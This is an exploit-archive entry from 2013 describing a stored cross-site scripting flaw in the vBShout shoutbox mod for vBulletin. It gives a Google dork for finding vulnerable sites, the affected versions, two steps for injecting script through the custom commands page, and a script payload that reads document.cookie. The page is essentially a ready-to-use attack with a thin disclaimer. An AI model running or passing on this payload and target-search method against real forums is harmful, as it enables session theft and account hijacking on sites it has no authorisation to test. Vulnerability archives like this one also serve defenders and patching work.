[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : vBulletin vBShout Mod - Stored XSS Vulnerability
# Published : 2013-07-10
# Author :
# Previous Title : PodHawk 1.85 - Arbitary File Upload Vulnerability
# Next Title : Barracuda SSL VPN 680Vx 2.3.3.193 - Multiple Script Injection Vulnerabilities


##########################################################################################
#
# Exploit Title: vBShout vBulletin - Stored XSS Vulnerability
# Google Dork: intext:vBShout
# Date: 10.07.2013
# Exploit Author: []0iZy5
# Vendor Homepage: www.backtrack-linux.ro
# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?do=product&productid=2
# Version: vBulletin 3.8.x, vBulletin 4.x.x, vBulletin 5.x.x  
# Tested on: Linux & Windows
#
##########################################################################################
#
# Stage 1: Go to -> UserCP -> Custom Commands 
# (Direct Link:) http://127.0.0.1/[path]/vbshout.php?do=profile&action=customcommands
#
# Stage 2: Add a malicious hash tag.
# (Example:) "><script>alert(document.cookie)</script>
#
##########################################################################################
#
# This was written for educational purpose only. use it at your own risk. 
# Author will be not responsible for any damage caused! user assumes all responsibility.  
# Intended for authorized web application pentesting only! 
#
##########################################################################################